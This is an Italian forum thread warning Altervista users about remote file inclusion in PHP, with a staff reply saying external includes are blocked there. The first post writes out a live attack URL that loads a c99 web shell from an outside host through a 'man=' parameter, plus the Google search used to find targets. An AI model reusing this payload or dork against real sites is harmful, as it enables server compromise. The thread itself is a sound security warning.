php import e sicurezza

apro questo topic per avvertire gli utenti di un problema banale e più che altro per segnalare un utente birichino

il problema è che ovviamente non si deve dare come input ad una pagina in php un file da importare, alcuni lo fanno anche se è ovvio che non è il caso


la segnalazione, gia comunicata per email allo staff è che ip-60-164.sn1.eutelia.it (o qualcuno tramite questo host) sta utilizzando questo script http://phpshell.altervista.org/shell/emperor_c99.txt per cercare di aprire una shell e attaccare qualche sito

l'attacco viene fatto cercando inurl:".php?man=" su google
e aprendo la pagina con il parametro
sito.it/pagina.php?man=http://phpshell.altervista.org/shell/emperor_c99.txt

nel caso venga incluso il file verrebbe aperta una shell sul sito per fare un po di tutto

non so se i siti su altervista impediscono di includere file esterni rendendo inutile l'attacco, ma mi sembrava giusto avvisare

ciao ciao

[Ospite]

non so se i siti su altervista impediscono di includere file esterni rendendo inutile l'attacco

Infatti, le inclusioni esterne sono bloccate.

Comunque, il forum non è il luogo più adatto per questo tipo di segnalazioni, che vanno invece effettuate all' Abuse.

Ciao!

ciao,
come ho scritto ho gia segnalato all'abuse
ho voluto postare anche qua perchè dato che altervista è utilizzato da molti che si affacciano alla programmazione poteva essere un'informazione utile, attacchi del genere sono molto comuni, e non ero sicuro sull'impossibilità di includere file esterni.

comunque, dato che non è possibile includere file esterni tutto ok ;-)